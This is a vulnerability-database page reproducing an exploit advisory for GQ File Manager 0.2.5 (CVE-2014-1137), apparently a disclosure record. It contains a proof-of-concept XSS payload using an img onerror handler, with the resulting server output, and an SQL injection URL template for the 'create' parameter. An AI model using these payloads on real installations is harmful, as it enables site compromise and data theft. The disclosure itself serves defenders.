Vulners
Lucene search
GQ File Manager 0.2.5 Sql Injection / Cross Site Scripting Vulnerabilities
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Codiad 2.4.3 Cross Site Scripting / Local File Inclusion Vulnerabilities | 20 Dec 201400:00 | – | zdt |
 | CVE-2014-1137 | 10 Jan 201500:00 | – | cve |
 | CVE-2014-1137 | 10 Jan 201500:00 | – | cvelist |
 | GQ File Manager 0.2.5 - Multiple Vulnerabilities | 19 Dec 201400:00 | – | exploitdb |
| Codiad 2.4.3 - Multiple Vulnerabilities | 19 Dec 201400:00 | – | exploitdb |
 | Codiad 2.4.3 - Multiple Vulnerabilities | 19 Dec 201400:00 | – | exploitpack |
| GQ File Manager 0.2.5 - Multiple Vulnerabilities | 19 Dec 201400:00 | – | exploitpack |
 | CVE-2014-1137 | 10 Jan 201500:59 | – | nvd |
 | GQ File Manager 0.2.5 Cross Site Scripting / SQL Injection | 20 Dec 201400:00 | – | packetstorm |
| Codiad 2.4.3 Cross Site Scripting / Local File Inclusion | 20 Dec 201400:00 | – | packetstorm |
10
# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://installatron.com/phpfilemanager
# Vendor Name: GQ File Manager
# Version: 0.2.5
# CVE: CVE-2014-1137
# Author: TaurusOmar
# Tiwtter: @TaurusOmar_
# Email: [email protected]
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High
Description
GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description - Created new file example:("xss.html")in the document insert code xss
Input:
"><img src=x onerror=;;alert('XSS') />
Output:
<br />
<b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />
"><img src=x onerror=alert("xss");>
#P0c
"><img src=x onerror=;;alert('XSS') />
#Proof Concept
http://i.imgur.com/cjIvR5l.jpg
------------------------
+ Sql Injection +
------------------------
# Exploiting Description - The Sql Injection in path created a new file.
#P0c
http://site.com/GQFileManager/index.php?&&output=create&create=[sql]
#Proof Concept
http://i.imgur.com/IJZoDVt.jpg
# 0day.today [2018-03-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Dec 2014 00:00Current
7High risk
Vulners AI Score7